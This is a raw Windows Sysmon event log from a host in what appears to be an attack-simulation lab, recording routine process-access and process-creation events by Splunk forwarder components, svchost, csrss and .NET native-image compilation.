AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.934{59A5CD1D-91C0-6005-0F03-00000000A301}14644200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.779{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.653{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C0-6005-0E03-00000000A301}3648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.637{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C0-6005-0E03-00000000A301}3648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.637{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C0-6005-0E03-00000000A301}3648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:48.403{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\374-0\System.Data.dll2021-01-18 13:48:48.403 10341000x80000000000000007317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.247{59A5CD1D-91C0-6005-0D03-00000000A301}45884888C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
